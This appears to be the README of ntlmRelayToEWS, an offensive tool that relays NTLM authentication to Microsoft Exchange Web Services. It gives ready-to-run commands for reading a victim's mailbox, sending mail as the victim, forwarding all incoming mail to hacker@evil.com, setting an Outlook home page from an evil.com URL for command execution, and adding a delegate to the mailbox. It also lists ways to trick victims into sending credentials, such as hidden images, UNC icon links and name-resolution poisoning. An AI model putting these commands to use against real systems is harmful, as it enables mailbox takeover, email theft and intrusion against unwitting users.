Limitations and Improvements
Requests.session
which is not the type of HTTP(S) session we have by default with the HTTPClientRelay: it would have required either to refactor the HTTPClientRelay to use 'Requests' (/me lazy) or to simply get zeep to create the messages with zeep.client.create_message()
and then send it with the relayed session we already have. Or is it because I'm a lame developper ? oh well...Prerequisites
ntlmRelayToEWS requires a proper/clean install of Impacket. So follow their instructions to get a working version of Impacket.
Usage
ntlmRelayToEWS implements the following attacks, which are all made on behalf of the relayed user (victim).
Refer to the help to get additional info: ./ntlmRelayToEWS -h
. Get more debug information using the --verbose
or -v
flag.
sendMail
Sends an HTML formed e-mail to a list of destinations:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r sendMail -d "user1@corporate.org,user2@corporate.com" -s Subject -m sampleMsg.html
getFolder
Retrieves all items from a predefined folder (inbox, sent items, calendar, tasks):
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r getFolder -f inbox
[adsense size='1']
forwardRule
Creates an evil forwarding rule that forwards all incoming message for the victim to another email address:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r forwardRule -d hacker@evil.com
setHomePage
Defines a folder home page (usually for the Inbox folder) by specifying a URL. This technique, uncovered by SensePost/Etienne Stalmans allows for arbitray command execution in the victim's Outlook program by forging a specific HTML page: Outlook Home Page – Another Ruler Vector:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r setHomePage -f inbox -u http://path.to.evil.com/evilpage.html
addDelegate
Sets a delegate address on the victim's primary mailbox. In other words, the victim delegates the control of its mailbox to someone else. Once done, it means the delegated address has full control over the victim's mailbox, by simply opening it as an additional mailbox in Outlook:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d delegated.address@corporate.org
How to get the victim to give you their credentials for relaying ?
In order to get the victim to send his credentials to ntlmRelayToEWS you can use any of the following well known methods:
- Send the victim an e-mail with a hidden picture which 'src' attribute points to the ntlmRelayToEWS server, using either HTTP or SMB. Check the
Invoke-SendEmail.ps1
script to achieve this. - Create a link file which 'icon' attribute points to the ntlmRelayToEWS using a UNC path and let victim browse a folder with this link
- Perform LLMNR, NBNS or WPAD poisonning (think of Responder.py or Invoke-Inveigh for instance) to get any corresponding SMB or HTTP trafic from the victim sent to ntlmRelayToEWS
- other ?
Author
Arno0x0x - @Arno0x0x
Gloss